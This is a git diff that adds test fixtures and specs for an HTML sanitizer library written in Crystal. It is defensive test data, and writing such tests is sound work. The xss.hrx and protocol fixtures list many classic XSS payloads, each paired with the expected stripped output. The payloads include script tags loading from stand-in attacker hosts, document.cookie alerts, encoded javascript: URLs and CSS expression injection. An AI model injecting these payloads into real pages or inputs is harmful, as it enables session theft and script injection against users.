+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:Compatibility>
+  <w:BreakWrappedTables/>
+  <w:SnapToGridInCell/>
+  <w:WrapTextWithPunct/>
+  <w:UseAsianBreakRules/>
+  <w:DontGrowAutofit/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+</w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+<w:LatentStyles DefLockedState="false" LatentStyleCount="156">
+</w:LatentStyles>
+</xml><![endif]--><style>
+<!--
+/* Style Definitions */
+p.MsoNormal, li.MsoNormal, div.MsoNormal
+{mso-style-parent:"";
+margin:0in;
+margin-bottom:.0001pt;
+mso-pagination:widow-orphan;
+font-size:12.0pt;
+font-family:"Times New Roman";
+mso-fareast-font-family:"Times New Roman";}
+@page Section1
+{size:8.5in 11.0in;
+margin:1.0in 1.25in 1.0in 1.25in;
+mso-header-margin:.5in;
+mso-footer-margin:.5in;
+mso-paper-source:0;}
+div.Section1
+{page:Section1;}
+-->
+</style><!--[if gte mso 10]>
+<style>
+/* Style Definitions */
+table.MsoNormalTable
+{mso-style-name:"Table Normal";
+mso-tstyle-rowband-size:0;
+mso-tstyle-colband-size:0;
+mso-style-noshow:yes;
+mso-style-parent:"";
+mso-padding-alt:0in 5.4pt 0in 5.4pt;
+mso-para-margin:0in;
+mso-para-margin-bottom:.0001pt;
+mso-pagination:widow-orphan;
+font-size:10.0pt;
+font-family:"Times New Roman";
+mso-ansi-language:#0400;
+mso-fareast-language:#0400;
+mso-bidi-language:#0400;}
+</style>
+<![endif]-->
+
+<p class="MsoNormal">Foo <b style="">BOLD<o:p></o:p></b></p>
+<===> msword/stripped.html
+<html><head>
+
+</head><body><p>Foo <b>BOLD</b></p>
+<===>
+
+
+<===> entities/fragment.html
+<p>foo&nbsp;bar</p>
+<===>
+
+
+<===> align/fragment.html
+<p align="center">foo</p>
+<===>
+
+
+<===> align-empty/fragment.html
+<p align="">foo</p>
+<===> align-empty/common.html
+<p>foo</p>
+<===>
+
+
+<===> align-invalid/fragment.html
+<p align="middle">foo</p>
+<===> align-invalid/common.html
+<p>foo</p>
+<===>
diff --git a/spec/html_sanitizer/html_sanitizer_spec.cr b/spec/html_sanitizer/html_sanitizer_spec.cr
new file mode 100644
index 0000000..f70a965
--- /dev/null
+++ b/spec/html_sanitizer/html_sanitizer_spec.cr
@@ -0,0 +1,102 @@
+require "../support/hrx"
+require "../../src/policy/html_sanitizer"
+
+describe Sanitize::Policy::HTMLSanitizer do
+  it "removes invalid element" do
+    Sanitize::Policy::HTMLSanitizer.common.process("<p>foo<invalid>bar</p>").should eq "<p>foobar</p>"
+  end
+
+  it "inserts whitespace for removed block tag" do
+    Sanitize::Policy::HTMLSanitizer.common.process("<p>foo<article>bar</article>baz</p>").should eq "<p>foo bar baz</p>"
+  end
+
+  it "strips tag with invalid URL attribute" do
+    Sanitize::Policy::HTMLSanitizer.common.process(%(<img src="foo:bar">)).should eq %(<img src=""/>)
+    Sanitize::Policy::HTMLSanitizer.common.process(%(<a href="foo:bar">foo</a>)).should eq "foo"
+  end
+
+  it "escapes URL attribute" do
+    Sanitize::Policy::HTMLSanitizer.common.process(%(<img src="jav&#13;ascript:alert('%20');"/>)).should eq %(<img src="jav%0Dascript:alert('%20');"/>)
+  end
+
+  it %(adds rel="noopener" on target="_blank") do
+    policy = Sanitize::Policy::HTMLSanitizer.common
+    policy.process(%(<a href="foo" target="_blank">foo</a>)).should eq(%(<a href="foo" rel="nofollow">foo</a>))
+    policy.accepted_attributes["a"] << "target"
+    policy.process(%(<a href="foo" target="_blank">foo</a>)).should eq(%(<a href="foo" target="_blank" rel="nofollow noopener">foo</a>))
+  end
+
+  it "doesn't leak configuration" do
+    policy = Sanitize::Policy::HTMLSanitizer.common
+    policy.accepted_attributes["p"] << "invalid"
+    policy.process(%(<p invalid="foo">bar</p>)).should eq(%(<p invalid="foo">bar</p>))
+    Sanitize::Policy::HTMLSanitizer.common.process(%(<p invalid="foo">bar</p>)).should eq(%(<p>bar</p>))
+  end
+
+  describe "html scaffold" do
+    it "fragment" do
+      Sanitize::Policy::HTMLSanitizer.common.process("<html><head><title>FOO</title></head><body><p>BAR</p></body>").should eq "FOO<p>BAR</p>"
+    end
+
+    it "document" do
+      sanitizer = Sanitize::Policy::HTMLSanitizer.common
+      sanitizer.accept_tag("html")
+      sanitizer.accept_tag("head")
+      sanitizer.accept_tag("body")
+      sanitizer.process_document("<html><head><title>FOO</title></head><body><p>BAR</p></body>").should eq "<html><head>FOO</head><body><p>BAR</p></body></html>\n"
+    end
+  end
+
+  describe "#transform_classes" do
+    it "strips classes by default" do
+      policy = Sanitize::Policy::HTMLSanitizer.inline
+      orig_attributes = {"class" => "foo bar baz"}
+      attributes = orig_attributes.clone
+      policy.transform_classes("div", attributes)
+      attributes.should eq Hash(String, String).new
+    end
+
+    it "accepts classes" do
+      policy = Sanitize::Policy::HTMLSanitizer.inline
+      orig_attributes = {"class" => "foo bar baz"}
+      attributes = orig_attributes.clone
+
+      policy.valid_classes << /fo*/
+      policy.valid_classes << "bar"
+      policy.transform_classes("div", attributes)
+      attributes.should eq({"class" => "foo bar"})
+    end
+
+    it "only matches full class name" do
+      policy = Sanitize::Policy::HTMLSanitizer.inline
+      orig_attributes = {"class" => "foobar barfoo barfoobaz foo fom"}
+      attributes = orig_attributes.clone
+
+      policy.valid_classes << /fo./
+      policy.transform_classes("div", attributes)
+      attributes.should eq({"class" => "foo fom"})
+    end
+  end
+
+  run_hrx_samples Path["basic.hrx"], {
+    "common" => Sanitize::Policy::HTMLSanitizer.common,
+  }
+  run_hrx_samples Path["protocol_javascript.hrx"], {
+    "common" => Sanitize::Policy::HTMLSanitizer.common,
+  }
+  run_hrx_samples Path["links.hrx"], {
+    "common" => Sanitize::Policy::HTMLSanitizer.common,
+  }
+  run_hrx_samples Path["xss.hrx"], {
+    "common" => Sanitize::Policy::HTMLSanitizer.common,
+  }
+  run_hrx_samples Path["img.hrx"], {
+    "common" => Sanitize::Policy::HTMLSanitizer.common,
+  }
+  run_hrx_samples Path["class.hrx"], {
+    "common"       => Sanitize::Policy::HTMLSanitizer.common,
+    "allow-prefix" => Sanitize::Policy::HTMLSanitizer.common.tap { |sanitizer|
+      sanitizer.valid_classes = Set{/allowed-.+/, "explicitly-allowed"}
+    },
+  }
+end
diff --git a/spec/html_sanitizer/img.hrx b/spec/html_sanitizer/img.hrx
new file mode 100644
index 0000000..1fd81d0
--- /dev/null
+++ b/spec/html_sanitizer/img.hrx
@@ -0,0 +1,46 @@
+<===> img/fragment.html
+<img src=""/>
+<===>
+
+
+<===> img with width/fragment.html
+<img src="" width="100"/>
+<===>
+
+
+<===> img with height/fragment.html
+<img src="" height="100"/>
+<===>
+
+
+<===> img with width and height/fragment.html
+<img src="" width="100" height="100"/>
+<===>
+
+
+<===> img invalid height/fragment.html
+<img src="" height="full"/>
+<===> img invalid height/common.html
+<img src=""/>
+<===>
+
+
+<===> img invalid width/fragment.html
+<img src="" width="full"/>
+<===> img invalid width/common.html
+<img src=""/>
+<===>
+
+
+
+<===> img invalid width and height/fragment.html
+<img src="" width="full" height="full"/>
+<===> img invalid width and height/common.html
+<img src=""/>
+<===>
+
+
+
+<===> img percent width and height/fragment.html
+<img src="" width="100%" height="100%"/>
+<===>
diff --git a/spec/html_sanitizer/links.hrx b/spec/html_sanitizer/links.hrx
new file mode 100644
index 0000000..1047408
--- /dev/null
+++ b/spec/html_sanitizer/links.hrx
@@ -0,0 +1,89 @@
+<===> links/1/fragment.html
+<a href="http://www.google.com"></a>
+<===> links/1/common.html
+<a href="http://www.google.com" rel="nofollow"/>
+<===>
+
+
+<===> links/2/fragment.html
+<a href="//www.google.com"></a>
+<===> links/2/common.html
+<a href="//www.google.com" rel="nofollow"/>
+<===>
+
+
+<===> links/3/fragment.html
+<a href="/www.google.com"></a>
+<===> links/3/common.html
+<a href="/www.google.com" rel="nofollow"/>
+<===>
+
+
+<===> links/4/fragment.html
+<a href="www.google.com"></a>
+<===> links/4/common.html
+<a href="www.google.com" rel="nofollow"/>
+<===>
+
+
+<===> links/5/fragment.html
+<a href="javascript:alert(1)"></a>
+<===> links/5/common.html
+
+<===>
+
+
+<===> links/6/fragment.html
+<a href="#"></a>
+<===> links/6/common.html
+
+<===>
+
+
+<===> links/7/fragment.html
+<a href="#top"></a>
+<===> links/7/common.html
+<a href="#top" rel="nofollow"/>
+<===>
+
+
+<===> links/8/fragment.html
+<a href="?q=1"></a>
+<===> links/8/common.html
+<a href="?q=1" rel="nofollow"/>
+<===>
+
+
+<===> links/9/fragment.html
+<a href="?q=1&r=2"></a>
+<===> links/9/common.html
+<a href="?q=1&amp;r=2" rel="nofollow"/>
+<===>
+
+
+<===> links/10/fragment.html
+<a href="?q=1&r=2&s=:foo@"></a>
+<===> links/10/common.html
+<a href="?q=1&amp;r=2&amp;s=:foo@" rel="nofollow"/>
+<===>
+
+
+<===> links/11/fragment.html
+<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAHElEQVQI12P4//8/w38GIAXDIBKE0DHxgljNBAAO9TXL0Y4OHwAAAABJRU5ErkJggg==" alt="Red dot" />
+<===> links/11/common.html
+<img src="" alt="Red dot"/>
+<===>
+
+
+<===> links/12/fragment.html
+<img src="giraffe.gif" />
+<===> links/12/common.html
+<img src="giraffe.gif"/>
+<===>
+
+
+<===> links/13/fragment.html
+<img src="giraffe.gif?height=500&width=500" />
+<===> links/13/common.html
+<img src="giraffe.gif?height=500&amp;width=500"/>
+<===>
diff --git a/spec/html_sanitizer/protocol-based-javascript.hrx b/spec/html_sanitizer/protocol-based-javascript.hrx
new file mode 100644
index 0000000..16576ea
--- /dev/null
+++ b/spec/html_sanitizer/protocol-based-javascript.hrx
@@ -0,0 +1,160 @@
+
+<===> simple, no spaces/fragment.html
+<a href="javascript:alert(\'XSS\');">foo</a>
+<===> simple, no spaces/common.html
+foo
+<===> simple, no spaces/restricted.html
+foo
+<===> simple, no spaces/basic.html
+<a rel="nofollow">foo</a>
+<===> simple, no spaces/relaxed.html
+<a>foo</a>
+
+<===> simple, spaces before/fragment.html
+<a href="javascript    :alert(\'XSS\');">foo</a>
+<===> simple, spaces before/common.html
+foo
+<===> simple, spaces before/restricted.html
+foo
+<===> simple, spaces before/basic.html
+<a rel="nofollow">foo</a>
+<===> simple, spaces before/relaxed.html
+<a>foo</a>
+
+<===> simple, spaces after/fragment.html
+<a href="javascript:    alert(\'XSS\');">foo</a>
+<===> simple, spaces after/common.html
+foo
+<===> simple, spaces after/restricted.html
+foo
+<===> simple, spaces after/basic.html
+<a rel="nofollow">foo</a>
+<===> simple, spaces after/relaxed.html
+<a>foo</a>
+
+<===> simple, spaces before and after/fragment.html
+<a href="javascript    :   alert(\'XSS\');">foo</a>
+<===> simple, spaces before and after/common.html
+foo
+<===> simple, spaces before and after/restricted.html
+foo
+<===> simple, spaces before and after/basic.html
+<a rel="nofollow">foo</a>
+<===> simple, spaces before and after/relaxed.html
+<a>foo</a>
+
+<===> preceding colon/fragment.html
+<a href=":javascript:alert(\'XSS\');">foo</a>
+<===> preceding colon/common.html
+foo
+<===> preceding colon/restricted.html
+foo
+<===> preceding colon/basic.html
+<a rel="nofollow">foo</a>
+<===> preceding colon/relaxed.html
+<a>foo</a>
+
+<===> UTF-8 encoding/fragment.html
+<a href="javascript&#58;">foo</a>
+<===> UTF-8 encoding/common.html
+foo
+<===> UTF-8 encoding/restricted.html
+foo
+<===> UTF-8 encoding/basic.html
+<a rel="nofollow">foo</a>
+<===> UTF-8 encoding/relaxed.html
+<a>foo</a>
+
+<===> long UTF-8 encoding/fragment.html
+<a href="javascript&#0058;">foo</a>
+<===> long UTF-8 encoding/common.html
+foo
+<===> long UTF-8 encoding/restricted.html
+foo
+<===> long UTF-8 encoding/basic.html
+<a rel="nofollow">foo</a>
+<===> long UTF-8 encoding/relaxed.html
+<a>foo</a>
+
+<===> long UTF-8 encoding without semicolons/fragment.html
+<a href=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>foo</a>
+<===> long UTF-8 encoding without semicolons/common.html
+foo
+<===> long UTF-8 encoding without semicolons/restricted.html
+foo
+<===> long UTF-8 encoding without semicolons/basic.html
+<a rel="nofollow">foo</a>
+<===> long UTF-8 encoding without semicolons/relaxed.html
+<a>foo</a>
+
+<===> hex encoding/fragment.html
+<a href="javascript&#x3A;">foo</a>
+<===> hex encoding/common.html
+foo
+<===> hex encoding/restricted.html
+foo
+<===> hex encoding/basic.html
+<a rel="nofollow">foo</a>
+<===> hex encoding/relaxed.html
+<a>foo</a>
+
+<===> long hex encoding/fragment.html
+<a href="javascript&#x003A;">foo</a>
+<===> long hex encoding/common.html
+foo
+<===> long hex encoding/restricted.html
+foo
+<===> long hex encoding/basic.html
+<a rel="nofollow">foo</a>
+<===> long hex encoding/relaxed.html
+<a>foo</a>
+
+<===> hex encoding without semicolons/fragment.html
+<a href=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>foo</a>
+<===> hex encoding without semicolons/common.html
+foo
+<===> hex encoding without semicolons/restricted.html
+foo
+<===> hex encoding without semicolons/basic.html
+<a rel="nofollow">foo</a>
+<===> hex encoding without semicolons/relaxed.html
+<a>foo</a>
+
+<===> null char/fragment.html
+<img src=java\0script:alert(\"XSS\")>
+<===> null char/common.html
+<===> null char/restricted.html
+<===> null char/basic.html
+<===> null char/relaxed.html
+<===> invalid URL char/fragment.html
+<img src=java\script:alert("XSS")>
+<===> invalid URL char/common.html
+
+<===> invalid URL char/restricted.html
+
+<===> invalid URL char/basic.html
+
+<===> invalid URL char/relaxed.html
+<img>
+
+<===> spaces and entities/fragment.html
+<img src=" &#14;  javascript:alert(\'XSS\');">
+<===> spaces and entities/common.html
+
+<===> spaces and entities/restricted.html
+
+<===> spaces and entities/basic.html
+
+<===> spaces and entities/relaxed.html
+<img>
+
+<===> protocol whitespace/fragment.html
+<a href=" http://example.com/"></a>
+<===> protocol whitespace/common.html
+
+<===> protocol whitespace/restricted.html
+
+<===> protocol whitespace/basic.html
+<a href="http://example.com/" rel="nofollow"></a>
+<===> protocol whitespace/relaxed.html
+<a href="http://example.com/"></a>
diff --git a/spec/html_sanitizer/protocol_javascript.hrx b/spec/html_sanitizer/protocol_javascript.hrx
new file mode 100644
index 0000000..fc4b86c
--- /dev/null
+++ b/spec/html_sanitizer/protocol_javascript.hrx
@@ -0,0 +1,67 @@
+<===>  simple, no spaces/fragment.html
+<a href="javascript:alert(\'XSS\');">foo</a>
+<===>  simple, no spaces/common.html
+foo
+<===>  simple, spaces before/fragment.html
+<a href="javascript    :alert(\'XSS\');">foo</a>
+<===>
+# TODO: Maybe this should strip the a tag
+<===>  simple, spaces before/common.html
+<a href="javascript%20%20%20%20:alert(%5C'XSS%5C');" rel="nofollow">foo</a>
+<===>  simple, spaces after/fragment.html
+<a href="javascript:    alert(\'XSS\');">foo</a>
+<===>  simple, spaces after/common.html
+foo
+<===>  simple, spaces before and after/fragment.html
+<a href="javascript    :   alert(\'XSS\');">foo</a>
+<===>
+# TODO: Maybe this should strip the a tag
+<===>  simple, spaces before and after/common.html
+<a href="javascript%20%20%20%20:%20%20%20alert(%5C'XSS%5C');" rel="nofollow">foo</a>
+<===>  preceding colon/fragment.html
+<a href=":javascript:alert(\'XSS\');">foo</a>
+<===>
+# TODO: Maybe this should strip the a tag
+<===>  preceding colon/common.html
+<a href=":javascript:alert(%5C'XSS%5C');" rel="nofollow">foo</a>
+<===>  UTF-8 encoding/fragment.html
+<a href="javascript&#58;">foo</a>
+<===>  UTF-8 encoding/common.html
+foo
+<===>  long UTF-8 encoding/fragment.html
+<a href="javascript&#0058;">foo</a>
+<===>  long UTF-8 encoding/common.html
+foo
+<===>  long UTF-8 encoding without semicolons/fragment.html
+<a href=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>foo</a>
+<===>  long UTF-8 encoding without semicolons/common.html
+foo
+<===>  hex encoding/fragment.html
+<a href="javascript&#x3A;">foo</a>
+<===>  hex encoding/common.html
+foo
+<===>  long hex encoding/fragment.html
+<a href="javascript&#x003A;">foo</a>
+<===>  long hex encoding/common.html
+foo
+<===>  hex encoding without semicolons/fragment.html
+<a href=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>foo</a>
+<===>  hex encoding without semicolons/common.html
+foo
+<===> null char/fragment.html
+<img src=java\0script:alert(\"XSS\")>
+<===>
+# TODO: Maybe this should strip the a tag
+<===> null char/common.html
+<img src="java%5C0script:alert(%5C%22XSS%5C%22)"/>
+<===>  invalid URL char/fragment.html
+<img src=java\script:alert("XSS")>
+<===>
+# TODO: Maybe this should strip the a tag
+<===>  invalid URL char/common.html
+<img src="java%5Cscript:alert(%22XSS%22)"/>
+<===>  spaces and entities/fragment.html
+<img src=" &#14;  javascript:alert(\'XSS\');">
+<===>  spaces and entities/common.html
+<img src=""/>
+<===>
diff --git a/spec/html_sanitizer/url_spec.cr b/spec/html_sanitizer/url_spec.cr
new file mode 100644
index 0000000..5e1aade
--- /dev/null
+++ b/spec/html_sanitizer/url_spec.cr
@@ -0,0 +1,8 @@
+require "../support/hrx"
+require "../../src/policy/html_sanitizer"
+
+describe "Sanitize::Policy::HTMLSanitizer" do
+  it "escapes URL attribute" do
+    Sanitize::Policy::HTMLSanitizer.common.process(%(<img src="jav&#13;ascript:alert('%20');"/>)).should eq %(<img src="jav%0Dascript:alert('%20');"/>)
+  end
+end
diff --git a/spec/html_sanitizer/xss.hrx b/spec/html_sanitizer/xss.hrx
new file mode 100644
index 0000000..d573491
--- /dev/null
+++ b/spec/html_sanitizer/xss.hrx
@@ -0,0 +1,475 @@
+<===> # Basic XSS
+<===> fragment.html
+test<script>alert(document.cookie)</script>
+<===> common.html
+test
+<===>
+
+
+<===> fragment.html
+<<<><<script src=http://fake-evil.ru/test.js>
+<===> common.html
+&lt;&lt;&lt;&gt;&lt;
+<===>
+
+
+<===> fragment.html
+<script<script src=http://fake-evil.ru/test.js>>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>
+<===>
+`
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<BODY ONLOAD=alert('XSS')>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<iframe src=http://ha.ckers.org/scriptlet.html <
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"">
+<===> common.html
+<===>
+
+
+<===> fragment.html
+<a onblur="alert(secret)" href="http://www.google.com">Google</a>
+<===> common.html
+<a href="http://www.google.com" rel="nofollow">Google</a>
+<===>
+
+
+# IMG attacks
+<===> fragment.html
+<img src="http://www.myspace.com/img.gif"/>
+<===> common.html
+<img src="http://www.myspace.com/img.gif"/>
+<===>
+
+
+<===> fragment.html
+<img src=javascript:alert(document.cookie)>
+<===> common.html
+<img src=""/>
+<===>
+
+
+<===> fragment.html
+<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
+<===> common.html
+<img src=""/>
+<===>
+
+
+<===> fragment.html
+<IMG SRC='&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041'>
+<===> common.html
+<img src=""/>
+<===>
+
+
+<===> fragment.html
+<IMG SRC="jav&#x0D;ascript:alert('XSS');">
+<===> common.html
+<img src="jav%0Dascript:alert('XSS');"/>
+<===>
+
+
+<===> fragment.html
+<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+<===> common.html
+<img src=""/>
+<===>
+
+
+<===> fragment.html
+<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+<===> common.html
+<img src=""/>
+<===>
+
+
+<===> fragment.html
+<IMG SRC="javascript:alert('XSS')"
+<===> common.html
+<img src=""/>
+<===>
+
+
+<===> fragment.html
+<IMG LOWSRC="javascript:alert('XSS')">
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<BGSOUND SRC="javascript:alert('XSS');">
+<===> common.html
+
+<===>
+
+
+# HREF attacks
+<===> fragment.html
+<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
+<===> common.html
+<ul><li>XSS</li></ul>
+<===>
+
+
+<===> fragment.html
+<IMG SRC='vbscript:msgbox("XSS")'>
+<===> common.html
+<img src=""/>
+<===>
+
+
+<===> fragment.html
+<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<TABLE BACKGROUND="javascript:alert('XSS')">
+<===> common.html
+<table/>
+<===>
+
+
+<===> fragment.html
+<TABLE><TD BACKGROUND="javascript:alert('XSS')">
+<===> common.html
+<table><td/></table>
+<===>
+
+
+<===> fragment.html
+<DIV STYLE="background-image: url(javascript:alert('XSS'))">
+<===> common.html
+<div/>
+<===>
+
+
+<===> fragment.html
+<DIV STYLE="width: expression(alert('XSS'));">
+<===> common.html
+<div/>
+<===>
+
+
+<===> fragment.html
+<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<STYLE>@im\\port'\\ja\\vasc\\ript:alert("XSS")';</STYLE>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<BASE HREF="javascript:alert('XSS');//">
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<BaSe hReF="http://arbitrary.com/">
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
+<===>
+
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<===> common.html
+PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;
+<===>
+
+
+<===> fragment.html
+<SCRIPT SRC=http://ha.ckers.org/xss.js
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>
+<===> common.html
+<div/>
+<===>
+
+
+<===> fragment.html
+<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->
+<===> common.html
+test--&gt;
+<===>
+
+
+<===> fragment.html
+<a></a style="xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
+<===> common.html
+
+<===>
+
+
+# CSS attacks
+<===> fragment.html
+<div style="position:absolute">
+<===> common.html
+<div/>
+<===>
+
+
+<===> fragment.html
+<style>b { position:absolute }</style>
+<===> common.html
+
+<===>
+
+
+<===> fragment.html
+<div style="z-index:25">test</div>
+<===> common.html
+<div>test</div>
+<===>
+
+
+<===> fragment.html
+<style>z-index:25</style>
+<===> common.html
+
+<===>
+
+
+# Strings that cause issues for tokenizers
+<===> fragment.html
+<a - href="http://www.test.com">
+<===> common.html
+<a href="http://www.test.com" rel="nofollow"/>
+<===>
+
+
+# Comments
+<===> fragment.html
+text <!-- comment -->
+<===> common.html
+text
+<===>
+
+
+<===> fragment.html
+<div>text <!-- comment --></div>
+<===> common.html
+<div>text </div>
+<===>
+
+
+<===> fragment.html
+<div>text <!--[if IE]> comment <[endif]--></div>
+<===> common.html
+<div>text </div>
+<===>
+
+
+<===> fragment.html
+<div>text <!--[if IE]> <!--[if gte 6]> comment <[endif]--><[endif]--></div>
+<===> common.html
+<div>text </div>
+<===>
+
+
+<===> fragment.html
+<div>text <!--[if IE]> <!-- IE specific --> comment <[endif]--></div>
+<===> common.html
+<div>text  comment </div>
+<===>
+
+
+<===> fragment.html
+<div>text <!-- [ if lte 6 ]>\ncomment <[ endif\n]--></div>
+<===> common.html
+<div>text </div>
+<===>
+
+
+<===> fragment.html
+<div>text <![if !IE]> comment <![endif]></div>
+<===> common.html
+<div>text  comment </div>
+<===>
+
+
+<===> fragment.html
+<div>text <![ if !IE]> comment <![endif]></div>
+<===> common.html
+<div>text  comment </div>
+<===>
+
+
+<===> img-unicode/fragment.html
+<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
+<===> img-unicode/common.html
+<img src=""/>
+<===>
+
+<===> img-hex/fragment.html
+<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+<===> img-hex/common.html
+<img src=""/>
+<===>
diff --git a/spec/spec_helper.cr b/spec/spec_helper.cr
new file mode 100644
index 0000000..e2f4f80
--- /dev/null
+++ b/spec/spec_helper.cr
@@ -0,0 +1 @@
